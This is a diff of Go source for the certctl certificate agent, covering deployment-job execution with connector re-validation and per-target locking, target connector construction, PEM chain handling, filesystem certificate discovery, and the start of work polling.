//  4. Instantiate the target connector based on target_type from the work response
//  5. Re-validate the connector config, then call DeployCertificate while holding the
//     per-target deploy mutex
//  6. Attempt post-deploy verification when a host/port can be extracted from the config
//  7. Report job as Completed (or Failed on any error above)
//
// When the job carries no target type, steps 4-6 are skipped and the job is still reported
// as Completed.
func (a *Agent) executeDeploymentJob(ctx context.Context, job JobItem) {
	a.logger.Info("executing deployment job",
		"job_id", job.ID,
		"certificate_id", job.CertificateID,
		"target_type", job.TargetType)

	// Report job as running
	if err := a.reportJobStatus(ctx, job.ID, "Running", ""); err != nil {
		a.logger.Error("failed to report job running", "error", err)
	}

	// Fetch the certificate from the control plane
	certPEM, err := a.fetchCertificate(ctx, job.CertificateID)
	if err != nil {
		a.logger.Error("failed to fetch certificate",
			"job_id", job.ID,
			"error", err)
		if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("cert fetch failed: %v", err)); reportErr != nil {
			a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
		}
		return
	}

	a.logger.Info("certificate fetched for deployment",
		"job_id", job.ID,
		"cert_length", len(certPEM))

	// Split the bundle into its first PEM block (the certificate to deploy) and
	// whatever PEM data follows it (the chain).
	certOnly, chainPEM := splitPEMChain(certPEM)

	// Load the locally-stored private key (agent keygen mode). The key is
	// mandatory: a read failure fails the job rather than deploying without it.
	keyPath := filepath.Join(a.config.KeyDir, job.CertificateID+".key")
	var keyPEM string
	keyData, err := os.ReadFile(keyPath)
	if err != nil {
		a.logger.Error("failed to read local private key for deployment",
			"job_id", job.ID,
			"key_path", keyPath,
			"error", err)
		if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key read failed: %v", err)); reportErr != nil {
			a.logger.Error("failed to report job status to server", "job_id", job.ID, "error", reportErr)
		}
		return
	}
	keyPEM = string(keyData)
	a.logger.Info("loaded local private key for deployment",
		"job_id", job.ID,
		"key_path", keyPath)

	// Deploy to the target using the appropriate connector
	if job.TargetType != "" {
		connector, err := a.createTargetConnector(ctx, job.TargetType, job.TargetConfig)
		if err != nil {
			a.logger.Error("failed to create target connector",
				"job_id", job.ID,
				"target_type", job.TargetType,
				"error", err)
			if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("connector init failed: %v", err)); reportErr != nil {
				a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
			}
			return
		}

		// Bundle 1 / RT-C1 closure (2026-05-12): defense in depth. The server
		// runs internal/connector/target/configcheck.Validate on the way IN
		// (Create/Update), and rejects shell metacharacters in command-bearing
		// fields. Re-run the connector's full ValidateConfig here on the way
		// OUT, before any DeployCertificate call. This catches (a) configs
		// that pre-date the server-side guard, (b) corruption/tampering of
		// the encrypted config blob, and (c) per-connector filesystem
		// invariants (cert dir exists, paths writable) that the server can't
		// check because the filesystem is on the agent host.
		if err := connector.ValidateConfig(ctx, job.TargetConfig); err != nil {
			a.logger.Error("connector config validation failed",
				"job_id", job.ID,
				"target_type", job.TargetType,
				"error", err)
			if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("%s config validation failed: %v", job.TargetType, err)); reportErr != nil {
				a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
			}
			return
		}

		deployReq := target.DeploymentRequest{
			CertPEM:      certOnly,
			KeyPEM:       keyPEM,
			ChainPEM:     chainPEM,
			TargetConfig: job.TargetConfig,
			Metadata: map[string]string{
				"certificate_id": job.CertificateID,
				"job_id":         job.ID,
			},
		}

		// Phase 2 of the deploy-hardening I master bundle:
		// per-target deploy mutex. Acquire BEFORE
		// DeployCertificate so two concurrent renewals against
		// the same target ID serialize. The lock is held for the
		// full Deploy duration including PreCommit (validate),
		// PostCommit (reload), and post-deploy verify (Phases
		// 4-9). Released on every return path via defer.
		//
		// Because the unlock is deferred, the lock is held until this function
		// returns, which also covers the final status report below. A nil
		// TargetID is looked up as the empty string; a nil mutex from
		// targetDeployMutex means no locking is performed.
		var targetID string
		if job.TargetID != nil {
			targetID = *job.TargetID
		}
		if mu := a.targetDeployMutex(targetID); mu != nil {
			mu.Lock()
			defer mu.Unlock()
		}

		result, err := connector.DeployCertificate(ctx, deployReq)
		if err != nil {
			a.logger.Error("deployment failed",
				"job_id", job.ID,
				"target_type", job.TargetType,
				"error", err)
			if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("deployment failed: %v", err)); reportErr != nil {
				a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
			}
			return
		}

		// NOTE(review): result.Success is only logged here; the job is reported
		// as Completed below whenever DeployCertificate returns a nil error.
		// Presumably connectors signal failure through err — confirm.
		a.logger.Info("target connector deployment completed",
			"job_id", job.ID,
			"target_type", job.TargetType,
			"success", result.Success,
			"message", result.Message)

		// Verify the deployment against the live endpoint whenever a host and
		// port can be extracted from the target config. Failing to extract them
		// only produces a warning; it does not fail the job. Any enable/disable
		// switch for verification would live inside verifyAndReportDeployment
		// (not visible here).
		targetHost, targetPort, err := extractTargetHostAndPort(job.TargetConfig)
		if err != nil {
			a.logger.Warn("could not extract target host/port for verification",
				"job_id", job.ID,
				"error", err)
		} else {
			a.verifyAndReportDeployment(ctx, job, targetHost, targetPort, certOnly)
		}
	} else {
		a.logger.Info("no target type specified, skipping connector invocation",
			"job_id", job.ID)
	}

	// Report job as completed
	if err := a.reportJobStatus(ctx, job.ID, "Completed", ""); err != nil {
		a.logger.Error("failed to report job completed", "error", err)
		return
	}

	a.logger.Info("deployment job completed", "job_id", job.ID)
}
|
|
||||||
|
|
||||||
// createTargetConnector instantiates the appropriate target connector based on type.
|
|
||||||
// ctx is threaded into SDK-driven connectors (AWSACM, AzureKeyVault) so credential
|
|
||||||
// resolution honors caller cancellation / deadlines instead of using a fresh
|
|
||||||
// context.Background() (the contextcheck linter enforces this — the original Rank 5
|
|
||||||
// implementation used Background() and tripped CI on commit 502823d).
|
|
||||||
func (a *Agent) createTargetConnector(ctx context.Context, targetType string, configJSON json.RawMessage) (target.Connector, error) {
|
|
||||||
switch targetType {
|
|
||||||
case "NGINX":
|
|
||||||
var cfg nginx.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid NGINX config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return nginx.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "Apache":
|
|
||||||
var cfg apache.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid Apache config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return apache.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "HAProxy":
|
|
||||||
var cfg haproxy.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid HAProxy config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return haproxy.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "F5":
|
|
||||||
var cfg f5.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid F5 config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
conn, err := f5.New(&cfg, a.logger)
|
|
||||||
if err != nil {
|
|
||||||
return nil, fmt.Errorf("failed to create F5 connector: %w", err)
|
|
||||||
}
|
|
||||||
return conn, nil
|
|
||||||
|
|
||||||
case "IIS":
|
|
||||||
var cfg iis.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid IIS config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return iis.New(&cfg, a.logger)
|
|
||||||
|
|
||||||
case "Traefik":
|
|
||||||
var cfg traefik.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid Traefik config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return traefik.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "Caddy":
|
|
||||||
var cfg caddy.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid Caddy config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return caddy.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "Envoy":
|
|
||||||
var cfg envoy.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid Envoy config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return envoy.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "Postfix":
|
|
||||||
var cfg pf.Config
|
|
||||||
cfg.Mode = "postfix"
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid Postfix config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return pf.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "Dovecot":
|
|
||||||
var cfg pf.Config
|
|
||||||
cfg.Mode = "dovecot"
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid Dovecot config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return pf.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "SSH":
|
|
||||||
var cfg sshconn.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid SSH config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return sshconn.New(&cfg, a.logger)
|
|
||||||
|
|
||||||
case "WinCertStore":
|
|
||||||
var cfg wcs.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid WinCertStore config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return wcs.New(&cfg, a.logger)
|
|
||||||
|
|
||||||
case "JavaKeystore":
|
|
||||||
var cfg jks.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid JavaKeystore config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return jks.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "KubernetesSecrets":
|
|
||||||
var cfg k8s.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid KubernetesSecrets config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return k8s.New(&cfg, a.logger)
|
|
||||||
|
|
||||||
case "AWSACM":
|
|
||||||
// Rank 5 of the 2026-05-03 Infisical deep-research deliverable.
|
|
||||||
// AWS Certificate Manager target — SDK-driven (no file I/O).
|
|
||||||
// LoadDefaultConfig handles the standard AWS credential chain
|
|
||||||
// (IRSA / EC2 instance profile / SSO / env vars) without any
|
|
||||||
// long-lived creds in connector Config.
|
|
||||||
var cfg awsacm.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid AWSACM config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return awsacm.New(ctx, &cfg, a.logger)
|
|
||||||
|
|
||||||
case "AzureKeyVault":
|
|
||||||
// Rank 5 of the 2026-05-03 Infisical deep-research deliverable.
|
|
||||||
// Azure Key Vault target — SDK-driven (no file I/O).
|
|
||||||
// DefaultAzureCredential handles the standard Azure credential
|
|
||||||
// chain (managed identity / workload identity / env vars / az
|
|
||||||
// CLI fallback). Long-lived service-principal secrets are
|
|
||||||
// supported but discouraged via the credential_mode config.
|
|
||||||
var cfg azurekv.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid AzureKeyVault config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return azurekv.New(ctx, &cfg, a.logger)
|
|
||||||
|
|
||||||
default:
|
|
||||||
return nil, fmt.Errorf("unsupported target type: %s", targetType)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// splitPEMChain separates a concatenated PEM bundle into its first block and
// everything that follows it.
//
// The control plane returns the full chain as a single string with PEM blocks
// concatenated. The first return value is the first PEM block, re-encoded;
// the second is the remaining text with surrounding whitespace trimmed (empty
// when there is nothing after the first block). When the input contains no
// PEM block at all it is returned unchanged as the first value with an empty
// chain.
func splitPEMChain(pemChain string) (string, string) {
	first, remainder := pem.Decode([]byte(pemChain))
	if first == nil {
		// Nothing decodable: hand the caller back exactly what it gave us.
		return pemChain, ""
	}

	leaf := pem.EncodeToMemory(first)
	// Trimming drops the blank lines/newlines that separate the leaf from
	// the rest of the chain; an all-whitespace remainder becomes "".
	return string(leaf), strings.TrimSpace(string(remainder))
}
|
|
||||||
|
|
||||||
// fetchCertificate retrieves the certificate PEM chain from the control plane.
|
|
||||||
// GET /api/v1/agents/{agentID}/certificates/{certID}
|
|
||||||
func (a *Agent) fetchCertificate(ctx context.Context, certID string) (string, error) {
|
|
||||||
path := fmt.Sprintf("/api/v1/agents/%s/certificates/%s", a.config.AgentID, certID)
|
|
||||||
resp, err := a.makeRequest(ctx, http.MethodGet, path, nil)
|
|
||||||
if err != nil {
|
|
||||||
return "", fmt.Errorf("request failed: %w", err)
|
|
||||||
}
|
|
||||||
defer resp.Body.Close()
|
|
||||||
|
|
||||||
if resp.StatusCode != http.StatusOK {
|
|
||||||
body, _ := io.ReadAll(resp.Body)
|
|
||||||
return "", fmt.Errorf("server returned %d: %s", resp.StatusCode, string(body))
|
|
||||||
}
|
|
||||||
|
|
||||||
var certResp struct {
|
|
||||||
CertificatePEM string `json:"certificate_pem"`
|
|
||||||
}
|
|
||||||
if err := json.NewDecoder(resp.Body).Decode(&certResp); err != nil {
|
|
||||||
return "", fmt.Errorf("failed to decode response: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
return certResp.CertificatePEM, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// reportJobStatus reports the result of a job back to the control plane.
|
// reportJobStatus reports the result of a job back to the control plane.
|
||||||
// POST /api/v1/agents/{agentID}/jobs/{jobID}/status
|
// POST /api/v1/agents/{agentID}/jobs/{jobID}/status
|
||||||
func (a *Agent) reportJobStatus(ctx context.Context, jobID string, status string, errorMsg string) error {
|
func (a *Agent) reportJobStatus(ctx context.Context, jobID string, status string, errorMsg string) error {
|
||||||
@@ -1067,239 +430,6 @@ func (a *Agent) makeRequest(ctx context.Context, method, path string, body inter
|
|||||||
return resp, nil
|
return resp, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// runDiscoveryScan walks configured directories, parses certificate files, and reports
|
|
||||||
// discovered certificates to the control plane.
|
|
||||||
// Supports PEM and DER encoded X.509 certificates.
|
|
||||||
func (a *Agent) runDiscoveryScan(ctx context.Context) {
|
|
||||||
a.logger.Info("starting filesystem certificate discovery scan",
|
|
||||||
"directories", a.config.DiscoveryDirs)
|
|
||||||
|
|
||||||
startTime := time.Now()
|
|
||||||
var certs []discoveredCertEntry
|
|
||||||
var scanErrors []string
|
|
||||||
|
|
||||||
for _, dir := range a.config.DiscoveryDirs {
|
|
||||||
a.logger.Debug("scanning directory", "path", dir)
|
|
||||||
|
|
||||||
err := filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {
|
|
||||||
if err != nil {
|
|
||||||
scanErrors = append(scanErrors, fmt.Sprintf("walk error at %s: %v", path, err))
|
|
||||||
return nil // continue walking
|
|
||||||
}
|
|
||||||
if info.IsDir() {
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// Skip files larger than 1MB (unlikely to be a certificate)
|
|
||||||
if info.Size() > 1*1024*1024 {
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// Check file extension
|
|
||||||
ext := strings.ToLower(filepath.Ext(path))
|
|
||||||
switch ext {
|
|
||||||
case ".pem", ".crt", ".cer", ".cert":
|
|
||||||
found := a.parsePEMFile(path)
|
|
||||||
certs = append(certs, found...)
|
|
||||||
case ".der":
|
|
||||||
if entry, err := a.parseDERFile(path); err == nil {
|
|
||||||
certs = append(certs, entry)
|
|
||||||
} else {
|
|
||||||
a.logger.Debug("skipping non-cert DER file", "path", path, "error", err)
|
|
||||||
}
|
|
||||||
default:
|
|
||||||
// Try PEM parsing for extensionless files or unknown extensions
|
|
||||||
if ext == "" || ext == ".key" {
|
|
||||||
return nil // skip key files and extensionless
|
|
||||||
}
|
|
||||||
found := a.parsePEMFile(path)
|
|
||||||
if len(found) > 0 {
|
|
||||||
certs = append(certs, found...)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return nil
|
|
||||||
})
|
|
||||||
if err != nil {
|
|
||||||
scanErrors = append(scanErrors, fmt.Sprintf("failed to walk %s: %v", dir, err))
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
scanDuration := time.Since(startTime)
|
|
||||||
a.logger.Info("discovery scan completed",
|
|
||||||
"certificates_found", len(certs),
|
|
||||||
"errors", len(scanErrors),
|
|
||||||
"duration_ms", scanDuration.Milliseconds())
|
|
||||||
|
|
||||||
if len(certs) == 0 && len(scanErrors) == 0 {
|
|
||||||
a.logger.Debug("no certificates found and no errors, skipping report")
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
// Build report payload
|
|
||||||
entries := make([]map[string]interface{}, len(certs))
|
|
||||||
for i, c := range certs {
|
|
||||||
entries[i] = map[string]interface{}{
|
|
||||||
"fingerprint_sha256": c.FingerprintSHA256,
|
|
||||||
"common_name": c.CommonName,
|
|
||||||
"sans": c.SANs,
|
|
||||||
"serial_number": c.SerialNumber,
|
|
||||||
"issuer_dn": c.IssuerDN,
|
|
||||||
"subject_dn": c.SubjectDN,
|
|
||||||
"not_before": c.NotBefore,
|
|
||||||
"not_after": c.NotAfter,
|
|
||||||
"key_algorithm": c.KeyAlgorithm,
|
|
||||||
"key_size": c.KeySize,
|
|
||||||
"is_ca": c.IsCA,
|
|
||||||
"pem_data": c.PEMData,
|
|
||||||
"source_path": c.SourcePath,
|
|
||||||
"source_format": c.SourceFormat,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
report := map[string]interface{}{
|
|
||||||
"agent_id": a.config.AgentID,
|
|
||||||
"directories": a.config.DiscoveryDirs,
|
|
||||||
"certificates": entries,
|
|
||||||
"errors": scanErrors,
|
|
||||||
"scan_duration_ms": int(scanDuration.Milliseconds()),
|
|
||||||
}
|
|
||||||
|
|
||||||
// Submit to control plane
|
|
||||||
path := fmt.Sprintf("/api/v1/agents/%s/discoveries", a.config.AgentID)
|
|
||||||
resp, err := a.makeRequest(ctx, http.MethodPost, path, report)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("failed to submit discovery report", "error", err)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
defer resp.Body.Close()
|
|
||||||
|
|
||||||
if resp.StatusCode != http.StatusAccepted {
|
|
||||||
body, _ := io.ReadAll(resp.Body)
|
|
||||||
a.logger.Error("discovery report rejected",
|
|
||||||
"status", resp.StatusCode,
|
|
||||||
"body", string(body))
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.logger.Info("discovery report submitted successfully",
|
|
||||||
"certificates", len(certs),
|
|
||||||
"errors", len(scanErrors))
|
|
||||||
}
|
|
||||||
|
|
||||||
// discoveredCertEntry is the flattened, JSON-friendly description of one
// certificate found by the filesystem discovery scan.
type discoveredCertEntry struct {
	// Identity of the certificate.
	FingerprintSHA256 string   `json:"fingerprint_sha256"`
	CommonName        string   `json:"common_name"`
	SANs              []string `json:"sans"`
	SerialNumber      string   `json:"serial_number"`
	IssuerDN          string   `json:"issuer_dn"`
	SubjectDN         string   `json:"subject_dn"`

	// Validity window, carried as pre-formatted timestamp strings.
	NotBefore string `json:"not_before"`
	NotAfter  string `json:"not_after"`

	// Public-key description and CA flag.
	KeyAlgorithm string `json:"key_algorithm"`
	KeySize      int    `json:"key_size"`
	IsCA         bool   `json:"is_ca"`

	// Certificate body (PEM text) and where/how it was found on disk.
	PEMData      string `json:"pem_data"`
	SourcePath   string `json:"source_path"`
	SourceFormat string `json:"source_format"`
}
|
|
||||||
|
|
||||||
// parsePEMFile reads a file and extracts all X.509 certificates from PEM blocks.
|
|
||||||
func (a *Agent) parsePEMFile(path string) []discoveredCertEntry {
|
|
||||||
data, err := os.ReadFile(path)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Debug("failed to read file", "path", path, "error", err)
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
var entries []discoveredCertEntry
|
|
||||||
rest := data
|
|
||||||
for {
|
|
||||||
var block *pem.Block
|
|
||||||
block, rest = pem.Decode(rest)
|
|
||||||
if block == nil {
|
|
||||||
break
|
|
||||||
}
|
|
||||||
if block.Type != "CERTIFICATE" {
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
cert, err := x509.ParseCertificate(block.Bytes)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Debug("failed to parse certificate in PEM", "path", path, "error", err)
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
|
|
||||||
pemStr := string(pem.EncodeToMemory(block))
|
|
||||||
entries = append(entries, certToEntry(cert, path, "PEM", pemStr))
|
|
||||||
}
|
|
||||||
return entries
|
|
||||||
}
|
|
||||||
|
|
||||||
// parseDERFile reads a DER-encoded certificate file.
|
|
||||||
func (a *Agent) parseDERFile(path string) (discoveredCertEntry, error) {
|
|
||||||
data, err := os.ReadFile(path)
|
|
||||||
if err != nil {
|
|
||||||
return discoveredCertEntry{}, fmt.Errorf("read failed: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
cert, err := x509.ParseCertificate(data)
|
|
||||||
if err != nil {
|
|
||||||
return discoveredCertEntry{}, fmt.Errorf("parse failed: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Convert to PEM for storage
|
|
||||||
pemStr := string(pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: data}))
|
|
||||||
return certToEntry(cert, path, "DER", pemStr), nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// certToEntry converts a parsed x509.Certificate into a discoveredCertEntry.
|
|
||||||
func certToEntry(cert *x509.Certificate, path, format, pemData string) discoveredCertEntry {
|
|
||||||
// Compute SHA-256 fingerprint
|
|
||||||
fingerprint := fmt.Sprintf("%x", sha256Sum(cert.Raw))
|
|
||||||
|
|
||||||
// Determine key algorithm and size
|
|
||||||
keyAlg, keySize := certKeyInfo(cert)
|
|
||||||
|
|
||||||
return discoveredCertEntry{
|
|
||||||
FingerprintSHA256: fingerprint,
|
|
||||||
CommonName: cert.Subject.CommonName,
|
|
||||||
SANs: cert.DNSNames,
|
|
||||||
SerialNumber: cert.SerialNumber.Text(16),
|
|
||||||
IssuerDN: cert.Issuer.String(),
|
|
||||||
SubjectDN: cert.Subject.String(),
|
|
||||||
NotBefore: cert.NotBefore.UTC().Format(time.RFC3339),
|
|
||||||
NotAfter: cert.NotAfter.UTC().Format(time.RFC3339),
|
|
||||||
KeyAlgorithm: keyAlg,
|
|
||||||
KeySize: keySize,
|
|
||||||
IsCA: cert.IsCA,
|
|
||||||
PEMData: pemData,
|
|
||||||
SourcePath: path,
|
|
||||||
SourceFormat: format,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// sha256Sum computes the SHA-256 digest of data and returns it as a
// fixed-size 32-byte array.
func sha256Sum(data []byte) [32]byte {
	digest := sha256.Sum256(data)
	return digest
}
|
|
||||||
|
|
||||||
// certKeyInfo reports the public-key algorithm name and key size in bits for
// cert.
//
// ECDSA keys report the curve's bit size and RSA keys the modulus bit length.
// Ed25519 (recognised via cert.PublicKeyAlgorithm) reports 256. Anything else
// returns the algorithm's String() form with a size of 0.
func certKeyInfo(cert *x509.Certificate) (string, int) {
	if ec, ok := cert.PublicKey.(*ecdsa.PublicKey); ok {
		return "ECDSA", ec.Curve.Params().BitSize
	}
	if rk, ok := cert.PublicKey.(*rsa.PublicKey); ok {
		return "RSA", rk.N.BitLen()
	}
	if cert.PublicKeyAlgorithm == x509.Ed25519 {
		return "Ed25519", 256
	}
	// Unrecognised key type: name it, but the size is unknown.
	return cert.PublicKeyAlgorithm.String(), 0
}
|
|
||||||
|
|
||||||
func main() {
|
func main() {
|
||||||
// Parse command-line flags (with env var fallbacks for Docker deployment)
|
// Parse command-line flags (with env var fallbacks for Docker deployment)
|
||||||
serverURL := flag.String("server", getEnvDefault("CERTCTL_SERVER_URL", "https://localhost:8443"), "Control plane server URL (must be https://)")
|
serverURL := flag.String("server", getEnvDefault("CERTCTL_SERVER_URL", "https://localhost:8443"), "Control plane server URL (must be https://)")
|
||||||
|
|||||||
@@ -0,0 +1,278 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"crypto/ecdsa"
|
||||||
|
"crypto/elliptic"
|
||||||
|
"crypto/rand"
|
||||||
|
"crypto/x509"
|
||||||
|
"crypto/x509/pkix"
|
||||||
|
"encoding/json"
|
||||||
|
"encoding/pem"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"net/http"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 12 (2026-05-14): extracted from
|
||||||
|
// cmd/agent/main.go via the Option B sibling-file pattern (mirrors
|
||||||
|
// the Sprint 8 cmd/server cut). Package stays `main`; all methods
|
||||||
|
// are still defined on *Agent so every call site continues to
|
||||||
|
// resolve through Go's same-package method-set without any
|
||||||
|
// import-path change.
|
||||||
|
//
|
||||||
|
// This file holds the WORK-POLLING entry point + CSR-job execution
|
||||||
|
// — the inbound side of the agent's pull-only deployment model
|
||||||
|
// (per CLAUDE.md "Pull-only deployment model" architecture
|
||||||
|
// decision):
|
||||||
|
//
|
||||||
|
// - pollForWork: queries GET /api/v1/agents/{id}/work each tick;
|
||||||
|
// dispatches each returned JobItem to the appropriate
|
||||||
|
// executor (CSR vs deployment).
|
||||||
|
// - executeCSRJob: handles AwaitingCSR jobs by generating an
|
||||||
|
// ECDSA P-256 key locally, persisting it to keyDir/<certID>.key
|
||||||
|
// with 0600 permissions (key NEVER leaves the agent — see
|
||||||
|
// CLAUDE.md "Agent-based key management"), creating the CSR,
|
||||||
|
// and POSTing it to the control plane for signing.
|
||||||
|
//
|
||||||
|
// The deployment-job executor lives in deploy.go alongside the
|
||||||
|
// target connector factory + deploy-only helpers (splitPEMChain,
|
||||||
|
// fetchCertificate). The discovery scan lives in discovery.go.
|
||||||
|
|
||||||
|
// pollForWork queries the control plane for actionable jobs and processes them.
|
||||||
|
// Jobs may be deployment jobs (Pending) or CSR jobs (AwaitingCSR).
|
||||||
|
// GET /api/v1/agents/{agentID}/work
|
||||||
|
func (a *Agent) pollForWork(ctx context.Context) {
|
||||||
|
a.logger.Debug("polling for work", "agent_id", a.config.AgentID)
|
||||||
|
|
||||||
|
path := fmt.Sprintf("/api/v1/agents/%s/work", a.config.AgentID)
|
||||||
|
resp, err := a.makeRequest(ctx, http.MethodGet, path, nil)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("work poll failed", "error", err)
|
||||||
|
a.consecutiveFailures++
|
||||||
|
return
|
||||||
|
}
|
||||||
|
defer resp.Body.Close()
|
||||||
|
|
||||||
|
// I-004: same terminal-retirement handling as sendHeartbeat. Work-poll is the
|
||||||
|
// other hot path that can observe an agent's soft-retirement; if the
|
||||||
|
// heartbeat tick happens to fire after a work-poll tick within the same
|
||||||
|
// retirement window, this branch catches it first. markRetired's sync.Once
|
||||||
|
// guards idempotency so racing both paths in the same tick only closes the
|
||||||
|
// signal channel once. No consecutiveFailures increment — retirement is
|
||||||
|
// not a transient failure.
|
||||||
|
if resp.StatusCode == http.StatusGone {
|
||||||
|
body, _ := io.ReadAll(resp.Body)
|
||||||
|
a.markRetired("work_poll", resp.StatusCode, string(body))
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
if resp.StatusCode != http.StatusOK {
|
||||||
|
body, _ := io.ReadAll(resp.Body)
|
||||||
|
a.logger.Error("work poll rejected",
|
||||||
|
"status", resp.StatusCode,
|
||||||
|
"body", string(body))
|
||||||
|
a.consecutiveFailures++
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
var workResp WorkResponse
|
||||||
|
if err := json.NewDecoder(resp.Body).Decode(&workResp); err != nil {
|
